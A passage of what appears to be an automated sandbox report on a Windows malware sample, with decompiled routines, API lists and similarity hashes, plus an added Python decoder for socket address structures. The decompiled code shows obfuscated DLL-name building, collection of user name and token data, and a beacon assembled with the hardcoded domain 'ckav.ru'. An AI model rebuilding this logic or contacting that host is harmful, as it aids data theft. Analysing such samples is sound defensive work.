                          					__imp__#23( *((intOrPtr*)(_t41 + 4)),  *((intOrPtr*)(_t41 + 8)),  *((intOrPtr*)(_t41 + 0xc)), _t42, _t30); // executed
                          					 *_t43 = _t24;
                          					if(_t24 != _t31) {
                          						// ws2_32 ordinal 4 = connect(s, ai_addr, ai_addrlen)
                          						__imp__#4(_t24,  *((intOrPtr*)(_t41 + 0x18)),  *((intOrPtr*)(_t41 + 0x10))); // executed
                          						if(_t24 == _t31) {                              // connect returned SOCKET_ERROR
                          							E00404DE5(_t24,  *_t43);                    // called on the socket; closesocket-style wrapper, not in this excerpt
                          							 *_t43 = _t31;
                          						}
                          						__imp__freeaddrinfo(_v8);
                          						if( *_t43 != _t31) {
                          							_t25 = _t43;                                // success: return the holder with the connected socket
                          							goto L10;
                          						} else {
                          							E00402BAB(_t43);
                          							L8:
                          							_t25 = 0;
                          							L10:
                          							return _t25;
                          						}
                          					}
                          					E00402BAB(_t43);
                          					__imp__freeaddrinfo(_v8);
                          					goto L8;
                          				}
                          				return 0;
                          			}
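To check the field accesses in the decompiled routine against the real 32-bit struct addrinfo layout, here is an added Python decoder for the addrinfo list and sockaddr_in that E00404E17 walks; it is not code from the sample or from Joe Sandbox. It reads a little-endian memory image at the offsets the routine dereferences (+4 ai_family, +8 ai_socktype, +0xC ai_protocol, +0x10 ai_addrlen, +0x18 ai_addr, +0x1C ai_next), follows ai_addr to the sockaddr_in, and stops on a NULL, looping or out-of-image pointer. The base address and the memory bytes are constructed for the example, not taken from the memory dumps listed in this report.

```python
"""Decode the 32-bit addrinfo list and sockaddr_in that E00404E17 walks.

Added example for this report, not code from the sample or from Joe Sandbox.
The base address and the memory image built below are constructed.
"""
import ipaddress
import struct

AF_INET, SOCK_STREAM, IPPROTO_TCP = 2, 1, 6
SAMPLE_HINTS = (AF_INET, SOCK_STREAM, IPPROTO_TCP)   # the hints E00404E17 fills in

# struct addrinfo on 32-bit Windows: eight 4-byte fields, 0x20 bytes in all
# (the memset of 8 dwords in the decompiled code zeroes exactly this).
# ai_flags, ai_family, ai_socktype, ai_protocol, ai_addrlen, ai_canonname, ai_addr, ai_next
ADDRINFO32 = struct.Struct("<IiiiIIII")
SOCKADDR_IN_LEN = 16


def _offset(mem, base, addr, size):
    """Translate a pointer into an offset in `mem`, rejecting anything outside the image."""
    off = addr - base
    if off < 0 or off + size > len(mem):
        raise ValueError(f"pointer {addr:#010x} outside the image")
    return off


def decode_sockaddr_in(mem, base, addr, addrlen):
    """Return (host, port) from a sockaddr_in; sin_port is stored in network byte order."""
    if addrlen < SOCKADDR_IN_LEN:
        raise ValueError("ai_addrlen too small for a sockaddr_in")
    off = _offset(mem, base, addr, SOCKADDR_IN_LEN)
    family, = struct.unpack_from("<H", mem, off)
    if family != AF_INET:
        raise ValueError(f"sin_family {family} is not AF_INET")
    port, = struct.unpack_from(">H", mem, off + 2)
    host = str(ipaddress.IPv4Address(bytes(mem[off + 4:off + 8])))
    return host, port


def read_addrinfo_chain(mem, base, ptr, max_nodes=16):
    """Walk ai_next from `ptr`; return [(family, socktype, protocol, host, port), ...].

    Stops on NULL, on a pointer already visited (a corrupted or looping list)
    or after max_nodes entries.
    """
    nodes, seen = [], set()
    while ptr and ptr not in seen and len(nodes) < max_nodes:
        seen.add(ptr)
        off = _offset(mem, base, ptr, ADDRINFO32.size)
        _flags, family, socktype, protocol, addrlen, _canon, addr, nxt = ADDRINFO32.unpack_from(mem, off)
        host, port = decode_sockaddr_in(mem, base, addr, addrlen) if addr else (None, None)
        nodes.append((family, socktype, protocol, host, port))
        ptr = nxt
    return nodes


def matches_sample_hints(node):
    """True when a node is the AF_INET/SOCK_STREAM/IPPROTO_TCP entry the sample asks for."""
    return node[:3] == SAMPLE_HINTS


BASE = 0x00500000   # constructed base address for the image below


def build_sample_memory():
    """Constructed image: two addrinfo nodes at BASE and BASE+0x20, their sockaddr_in at +0x40 and +0x50."""
    mem = bytearray(0x60)
    ADDRINFO32.pack_into(mem, 0x00, 0, AF_INET, SOCK_STREAM, IPPROTO_TCP, 16, 0, BASE + 0x40, BASE + 0x20)
    ADDRINFO32.pack_into(mem, 0x20, 0, AF_INET, SOCK_STREAM, IPPROTO_TCP, 16, 0, BASE + 0x50, 0)
    # sockaddr_in: sin_family (little-endian), sin_port (big-endian), sin_addr, 8 bytes of padding.
    # The addresses are documentation ranges, not infrastructure from this report.
    mem[0x40:0x50] = struct.pack("<H", AF_INET) + struct.pack(">H", 80) + bytes([192, 0, 2, 10]) + bytes(8)
    mem[0x50:0x60] = struct.pack("<H", AF_INET) + struct.pack(">H", 8080) + bytes([198, 51, 100, 7]) + bytes(8)
    return bytes(mem)


if __name__ == "__main__":
    for node in read_addrinfo_chain(build_sample_memory(), BASE, BASE):
        print(node, "matches sample hints" if matches_sample_hints(node) else "")
```

The decoder follows the whole ai_next chain, which the sample does not: E00404E17 tries only the first result, so a name that resolves to several addresses with an unreachable first entry leaves it without a connection. The same decoder can be pointed at the 0x4A0000 heap region listed under Memory Dump Source once the result list has been located in it.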


















                          APIs
                          • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                          • socket.WS2_32(?,?,?), ref: 00404E7A
                          • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                          Memory Dump Source
                          • Source File: 00000000.00000002.662491625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.662489145.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp
• Associated: 00000000.00000002.662507726.00000000004A0000.00000004.00020000.sdmp
                          Yara matches
                          Similarity
                          • API ID: freeaddrinfogetaddrinfosocket
                          • String ID:
                          • API String ID: 2479546573-0
                          • Opcode ID: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
                          • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                          • Opcode Fuzzy Hash: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
                          • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 74%
                          			E004040BB(void* __eflags, WCHAR* _a4, long* _a8, intOrPtr _a12) {
                          				struct _SECURITY_ATTRIBUTES* _v8;
                          				char _v12;
                          				long _v16;
                          				void* __ebx;
                          				void* __edi;
                          				void* _t16;
                          				intOrPtr* _t25;
                          				long* _t28;
                          				void* _t30;
                          				int _t32;
                          				intOrPtr* _t33;
                          				void* _t35;
                          				void* _t42;
                          				intOrPtr _t43;
                          				long _t44;
                          				struct _OVERLAPPED* _t46;
                          
                          				_t46 = 0;
                          				_t35 = 0;
                          				E004031E5(0, 0, 0xe9fabb88, 0, 0);
                          				_t16 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0); // executed
                          				_t42 = _t16;
                          				_v8 = _t42;
                          				if(_t42 == 0xffffffff) {
                          					__eflags = _a12;
                          					if(_a12 == 0) {
                          						L10:
                          						return _t35;
                          					}
                          					_t43 = E00403C90(_t42, L".tmp", 0, 0, 0x1a);
                          					__eflags = _t43;
                          					if(_t43 == 0) {
                          						goto L10;
                          					}
                          					_push(0);
                          					__eflags = E00403C59(_a4, _t43);
                          					if(__eflags != 0) {
                          						_v8 = 0;
                          						_t46 = E004040BB(__eflags, _t43,  &_v8, 0);
                          						_push(_t43);
                          						 *_a8 = _v8;
                          						E00403D44();
                          					}
                          					E00402BAB(_t43);
                          					return _t46;
                          				}
                          				_t25 = E004031E5(0, 0, 0xf9435d1e, 0, 0);
                          				_t44 =  *_t25(_t42,  &_v12);
                          				if(_v12 != 0 || _t44 > 0x40000000) {
                          					L8:
                          					_t45 = _v8;
                          					goto L9;
                          				} else {
                          					_t28 = _a8;
                          					if(_t28 != 0) {
                          						 *_t28 = _t44;
                          					}
                          					E004031E5(_t35, _t46, 0xd4ead4e2, _t46, _t46);
                          					_t30 = VirtualAlloc(_t46, _t44, 0x1000, 4); // executed
                          					_t35 = _t30;
                          					if(_t35 == 0) {
                          						goto L8;
                          					} else {
                          						E004031E5(_t35, _t46, 0xcd0c9940, _t46, _t46);
                          						_t45 = _v8;
                          						_t32 = ReadFile(_v8, _t35, _t44,  &_v16, _t46); // executed
                          						if(_t32 == 0) {
                          							_t33 = E004031E5(_t35, _t46, 0xf53ecacb, _t46, _t46);
                          							 *_t33(_t35, _t46, 0x8000);
                          							_t35 = _t46;
                          						}
                          						L9:
                          						E00403C40(_t45); // executed
                          						goto L10;
                          					}
                          				}
                          			}


                          APIs
                          • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
                          • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
                          • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.662491625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.662489145.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp
• Associated: 00000000.00000002.662507726.00000000004A0000.00000004.00020000.sdmp
                          Yara matches
                          Similarity
                          • API ID: File$AllocCreateReadVirtual
                          • String ID: .tmp
                          • API String ID: 3585551309-2986845003
                          • Opcode ID: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                          • Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
                          • Opcode Fuzzy Hash: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                          • Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 79%
                          			E00413866(void* __eflags) {
                          				short _v6;
                          				short _v8;
                          				short _v10;
                          				short _v12;
                          				short _v14;
                          				short _v16;
                          				short _v18;
                          				short _v20;
                          				short _v22;
                          				char _v24;
                          				short _v28;
                          				short _v30;
                          				short _v32;
                          				short _v34;
                          				short _v36;
                          				short _v38;
                          				short _v40;
                          				short _v42;
                          				short _v44;
                          				short _v46;
                          				char _v48;
                          				short _v52;
                          				short _v54;
                          				short _v56;
                          				short _v58;
                          				short _v60;
                          				short _v62;
                          				short _v64;
                          				short _v66;
                          				short _v68;
                          				short _v70;
                          				short _v72;
                          				short _v74;
                          				char _v76;
                          				void* __ebx;
                          				void* __edi;
                          				void* _t38;
                          				short _t43;
                          				short _t44;
                          				short _t45;
                          				short _t46;
                          				short _t47;
                          				short _t48;
                          				short _t50;
                          				short _t51;
                          				short _t52;
                          				short _t54;
                          				short _t55;
                          				intOrPtr* _t57;
                          				intOrPtr* _t59;
                          				intOrPtr* _t61;
                          				void* _t63;
                          				WCHAR* _t65;
                          				long _t68;
                          				void* _t75;
                          				short _t76;
                          				short _t78;
                          				short _t83;
                          				short _t84;
                          				short _t85;
                          
                          				E00402C6C(_t38);
                          				E004031E5(_t75, 0, 0xd1e96fcd, 0, 0);
                          				SetErrorMode(3); // executed
                          				_t43 = 0x4f;
                          				_v76 = _t43;
                          				_t44 = 0x4c;
                          				_v74 = _t44;
                          				_t45 = 0x45;
                          				_v72 = _t45;
                          				_t46 = 0x41;
                          				_v70 = _t46;
                          				_t47 = 0x55;
                          				_v68 = _t47;
                          				_t48 = 0x54;
                          				_t76 = 0x33;
                          				_t84 = 0x32;
                          				_t83 = 0x2e;
                          				_t78 = 0x64;
                          				_t85 = 0x6c;
                          				_v66 = _t48;
                          				_v52 = 0;
                          				_t50 = 0x77;
                          				_v48 = _t50;
                          				_t51 = 0x73;
                          				_v46 = _t51;
                          				_t52 = 0x5f;
                          				_v42 = _t52;
                          				_v28 = 0;
                          				_t54 = 0x6f;
                          				_v24 = _t54;
                          				_t55 = 0x65;
                          				_v20 = _t55;
                          				_v64 = _t76;
                          				_v62 = _t84;
                          				_v60 = _t83;
                          				_v58 = _t78;
                          				_v56 = _t85;
                          				_v54 = _t85;
                          				_v44 = _t84;
                          				_v40 = _t76;
                          				_v38 = _t84;
                          				_v36 = _t83;
                          				_v34 = _t78;
                          				_v32 = _t85;
                          				_v30 = _t85;
                          				_v22 = _t85;
                          				_v18 = _t76;
                          				_v16 = _t84;
                          				_v14 = _t83;
                          				_v12 = _t78;
                          				_v10 = _t85;
                          				_v8 = _t85;
                          				_v6 = 0;
                          				_t57 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
                          				 *_t57( &_v76);
                          				_t59 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
                          				 *_t59( &_v48);
                          				_t61 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
                          				_t81 =  &_v24;
                          				 *_t61( &_v24); // executed
                          				_t63 = E00414059(); // executed
                          				if(_t63 != 0) {
                          					_t65 = E00413D97(0);
                          					E004031E5(0, 0, 0xcf167df4, 0, 0);
                          					CreateMutexW(0, 1, _t65); // executed
                          					_t68 = GetLastError();
                          					_t92 = _t68 - 0xb7;
                          					if(_t68 == 0xb7) {
                          						E00413B81(0);
                          						_pop(_t81); // executed
                          					}
                          					E00413003(_t92); // executed
                          					E00412B2E(_t92); // executed
                          					E00412D31(_t81, _t84); // executed
                          					E00413B3F();
                          					E00413B81(0);
                          					 *0x49fdd0 = 1;
                          				}
                          				return 0;
                          			}


                          APIs
                          • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                          • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                          • GetLastError.KERNEL32 ref: 0041399E
                          Memory Dump Source
                          • Source File: 00000000.00000002.662491625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.662489145.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp
• Associated: 00000000.00000002.662507726.00000000004A0000.00000004.00020000.sdmp
                          Yara matches
                          Similarity
                          • API ID: Error$CreateLastModeMutex
                          • String ID:
                          • API String ID: 3448925889-0
                          • Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                          • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                          • Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                          • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E004042CF(void* __ebx, void* __eflags, WCHAR* _a4, void* _a8, long _a12) {
                          				long _v8;
                          				void* _t7;
                          				long _t10;
                          				void* _t21;
                          				struct _OVERLAPPED* _t24;
                          
                          				_t14 = __ebx;
                          				_t24 = 0;
                          				_v8 = 0;
                          				E004031E5(__ebx, 0, 0xe9fabb88, 0, 0);
                          				_t7 = CreateFileW(_a4, 0xc0000000, 0, 0, 4, 0x80, 0); // executed
                          				_t21 = _t7;
                          				if(_t21 != 0xffffffff) {
                          					E004031E5(__ebx, 0, 0xeebaae5b, 0, 0);
                          					_t10 = SetFilePointer(_t21, 0, 0, 2); // executed
                          					if(_t10 != 0xffffffff) {
                          						E004031E5(_t14, 0, 0xc148f916, 0, 0);
                          						WriteFile(_t21, _a8, _a12,  &_v8, 0); // executed
                          						_t24 =  !=  ? 1 : 0;
                          					}
                          					E00403C40(_t21); // executed
                          				}
                          				return _t24;
                          			}


                          APIs
                          • CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
                          • WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334
                          Memory Dump Source
                          • Source File: 00000000.00000002.662491625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.662489145.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp
• Associated: 00000000.00000002.662507726.00000000004A0000.00000004.00020000.sdmp
                          Yara matches
                          Similarity
                          • API ID: File$CreatePointerWrite
                          • String ID:
                          • API String ID: 3672724799-0
                          • Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                          • Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
                          • Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                          • Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 34%
                          			E00412D31(void* __ecx, void* __edi) {
                          				long _v8;
                          				intOrPtr _v12;
                          				intOrPtr _v16;
                          				intOrPtr _v20;
                          				char _v24;
                          				char _v40;
                          				void* __ebx;
                          				intOrPtr* _t10;
                          				void* _t11;
                          				void* _t25;
                          				void* _t26;
                          				void* _t27;
                          				void* _t35;
                          				void* _t53;
                          				char* _t57;
                          				void* _t58;
                          				void* _t61;
                          				void* _t64;
                          				void* _t65;
                          				intOrPtr* _t66;
                          				void* _t67;
                          				void* _t68;
                          				void* _t69;
                          				void* _t70;
                          				void* _t71;
                          				void* _t72;
                          				void* _t73;
                          
                          				_t53 = __ecx;
                          				_t10 =  *0x49fde0;
                          				_t68 = _t67 - 0x24;
                          				 *0x49fddc = 0x927c0;
                          				 *0x49fde4 = 0;
                          				_t75 = _t10;
                          				if(_t10 != 0) {
                          					L16:
                          					_push(1);
                          					_t11 = E004141A7(_t80,  *_t10,  *((intOrPtr*)(_t10 + 8))); // executed
                          					_t61 = _t11;
                          					_t68 = _t68 + 0xc;
                          					if(_t61 != 0) {
                          						E004031E5(0, 0, 0xfcae4162, 0, 0);
                          						CreateThread(0, 0, E0041289A, _t61, 0,  &_v8); // executed
                          					}
                          					L004067C4(0xea60); // executed
                          					_pop(_t53);
                          				} else {
                          					_push(__edi);
                          					 *0x49fde0 = E004056BF(0x2bc);
                          					E00413DB7(_t53, _t75,  &_v40);
                          					_t57 =  &_v24;
                          					asm("movsd");
                          					asm("movsd");
                          					asm("movsd");
                          					asm("movsd");
                          					E004058D4( *0x49fde0, 0x12);
                          					E004058D4( *0x49fde0, 0x28);
                          					E00405872( *0x49fde0, "ckav.ru", 0, 0);
                          					_t69 = _t68 + 0x28;
                          					_t64 = E0040632F();
                          					_push(0);
                          					_push(1);
                          					if(_t64 == 0) {
                          						_push(0);
                          						_push( *0x49fde0);
                          						E00405872();
                          						_t70 = _t69 + 0x10;
                          					} else {
                          						_push(_t64);
                          						_push( *0x49fde0);
                          						E00405872();
                          						E00402BAB(_t64);
                          						_t70 = _t69 + 0x14;
                          					}
                          					_t58 = E00406130(_t57);
                          					_push(0);
                          					_push(1);
                          					_t77 = _t64;
                          					if(_t64 == 0) {
                          						_push(0);
                          						_push( *0x49fde0);
                          						_t25 = E00405872();
                          						_t71 = _t70 + 0x10; // executed
                          					} else {
                          						_push(_t58);
                          						_push( *0x49fde0);
                          						E00405872();
                          						_t25 = E00402BAB(_t58);
                          						_t71 = _t70 + 0x14;
                          					}
                          					_t26 = E004061C3(_t25, 0, _t77); // executed
                          					_t65 = _t26;
                          					_push(0);
                          					_push(1);
                          					if(_t65 == 0) {
                          						_push(0);
                          						_push( *0x49fde0);
                          						_t27 = E00405872();
                          						_t72 = _t71 + 0x10;
                          					} else {
                          						_push(_t65);
                          						_push( *0x49fde0);
                          						E00405872();
                          						_t27 = E00402BAB(_t65);
                          						_t72 = _t71 + 0x14;
                          					}
                          					_t66 = E00406189(_t27);
                          					_t79 = _t66;
                          					if(_t66 == 0) {
                          						E00405781( *0x49fde0, 0);
                          						E00405781( *0x49fde0, 0);
                          						_t73 = _t72 + 0x10;
                          					} else {
                          						E00405781( *0x49fde0,  *_t66);
                          						E00405781( *0x49fde0,  *((intOrPtr*)(_t66 + 4)));
                          						E00402BAB(_t66);
                          						_t73 = _t72 + 0x14;
                          					}
                          					E004058D4( *0x49fde0, E004063B2(0, _t53, _t79));
                          					E004058D4( *0x49fde0, E004060BD(_t79)); // executed
                          					_t35 = E0040642C(_t79); // executed
                          					E004058D4( *0x49fde0, _t35);
                          					E004058D4( *0x49fde0, _v24);
                          					E004058D4( *0x49fde0, _v20);
                          					E004058D4( *0x49fde0, _v16);
                          					E004058D4( *0x49fde0, _v12);
                          					E00405872( *0x49fde0, E00413D97(0), 1, 0);
                          					_t68 = _t73 + 0x48;
                          				}
                          				_t80 =  *0x49fde4;
                          				if( *0x49fde4 == 0) {
                          					_t10 =  *0x49fde0;
                          					goto L16;
                          				}
                          				return E00405695(_t53,  *0x49fde0);
                          			}

                           Instruction addresses: 0x00412d31 0x00412d34 0x00412d39 0x00412d3c 0x00412d49 0x00412d50 0x00412d52 0x00412f24 0x00412f24 0x00412f2b 0x00412f30 0x00412f32 0x00412f37 0x00412f41 0x00412f53 0x00412f53 0x00412f5b 0x00412f60 0x00412d58 0x00412d58 0x00412d63 0x00412d6c 0x00412d73 0x00412d7e 0x00412d7f 0x00412d80 0x00412d81 0x00412d82 0x00412d8f 0x00412da1 0x00412da6 0x00412dae 0x00412db0 0x00412db1 0x00412db5 0x00412dce 0x00412dcf 0x00412dd5 0x00412dda 0x00412db7 0x00412db7 0x00412db8 0x00412dbe 0x00412dc4 0x00412dc9 0x00412dc9 0x00412de2 0x00412de4 0x00412de5 0x00412de7 0x00412de9 0x00412e02 0x00412e03 0x00412e09 0x00412e0e 0x00412deb 0x00412deb 0x00412dec 0x00412df2 0x00412df8 0x00412dfd 0x00412dfd 0x00412e11 0x00412e17 0x00412e19 0x00412e1a 0x00412e1e 0x00412e37 0x00412e38 0x00412e3e 0x00412e43 0x00412e20 0x00412e20 0x00412e21 0x00412e27 0x00412e2d 0x00412e32 0x00412e32 0x00412e4b 0x00412e4d 0x00412e4f 0x00412e7e 0x00412e8a 0x00412e8f 0x00412e51 0x00412e59 0x00412e67 0x00412e6d 0x00412e72 0x00412e72 0x00412e9e 0x00412eaf 0x00412eb4 0x00412ec0 0x00412ece 0x00412edc 0x00412eea 0x00412ef8 0x00412f0f 0x00412f14 0x00412f14 0x00412f17 0x00412f1d 0x00412f1f 0x00000000 0x00412f1f 0x00412f74

                          APIs
                          • CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53
                            • Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F
                            • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                            • Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.662491625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000000.00000002.662489145.0000000000400000.00000002.00020000.sdmp
                           • Associated: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp
                           • Associated: 00000000.00000002.662507726.00000000004A0000.00000004.00020000.sdmp
                          Yara matches
                          Similarity
                          • API ID: Heap$CreateFreeProcessThread_wmemset
                          • String ID: ckav.ru
                          • API String ID: 2915393847-2696028687
                          • Opcode ID: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                          • Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
                          • Opcode Fuzzy Hash: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                          • Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0040632F() {
                          				char _v8;
                          				void* _t4;
                          				void* _t7;
                          				void* _t16;
                          
                          				_t16 = E00402B7C(0x208);
                          				if(_t16 == 0) {
                          					L4:
                          					_t4 = 0;
                          				} else {
                          					E0040338C(_t16, 0, 0x104);
                          					_t1 =  &_v8; // 0x4143e8
                          					_v8 = 0x208;
                          					_t7 = E00406069(_t16, _t1); // executed
                          					if(_t7 == 0) {
                          						E00402BAB(_t16);
                          						goto L4;
                          					} else {
                          						_t4 = _t16;
                          					}
                          				}
                          				return _t4;
                          			}

                           Instruction addresses: 0x00406340 0x00406345 0x00406373 0x00406373 0x00406347 0x0040634f 0x00406354 0x00406357 0x0040635c 0x00406366 0x0040636d 0x00000000 0x00406368 0x00406368 0x00406368 0x00406366 0x0040637a

                          APIs
                            • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                            • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                          • _wmemset.LIBCMT ref: 0040634F
                            • Part of subcall function 00406069: GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.662491625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000000.00000002.662489145.0000000000400000.00000002.00020000.sdmp
                           • Associated: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp
                           • Associated: 00000000.00000002.662507726.00000000004A0000.00000004.00020000.sdmp
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateNameProcessUser_wmemset
                          • String ID: CA
                          • API String ID: 2078537776-1052703068
                          • Opcode ID: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
                          • Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
                          • Opcode Fuzzy Hash: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
                          • Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00406086(void* _a4, union _TOKEN_INFORMATION_CLASS _a8, void* _a12, long _a16, DWORD* _a20) {
                          				int _t7;
                          				void* _t8;
                          
                          				E004031E5(_t8, 9, 0xecae3497, 0, 0);
                          				_t7 = GetTokenInformation(_a4, _a8, _a12, _a16, _a20); // executed
                          				return _t7;
                          			}

                           Instruction addresses: 0x00406094 0x004060a8 0x004060ab

                          APIs
                          • GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.662491625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000000.00000002.662489145.0000000000400000.00000002.00020000.sdmp
                           • Associated: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp
                           • Associated: 00000000.00000002.662507726.00000000004A0000.00000004.00020000.sdmp
                          Yara matches
                          Similarity
                          • API ID: InformationToken
                          • String ID: IDA
                          • API String ID: 4114910276-365204570
                          • Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                          • Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
                          • Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                          • Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00402C03(struct HINSTANCE__* _a4, char _a8) {
                          				_Unknown_base(*)()* _t5;
                          				void* _t6;
                          
                          				E004031E5(_t6, 0, 0xceb18abc, 0, 0);
                          				_t1 =  &_a8; // 0x403173
                          				_t5 = GetProcAddress(_a4,  *_t1); // executed
                          				return _t5;
                          			}

                           Instruction addresses: 0x00402c10 0x00402c15 0x00402c1b 0x00402c1e

                          APIs
                          • GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.662491625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000000.00000002.662489145.0000000000400000.00000002.00020000.sdmp
                           • Associated: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp
                           • Associated: 00000000.00000002.662507726.00000000004A0000.00000004.00020000.sdmp
                          Yara matches
                          Similarity
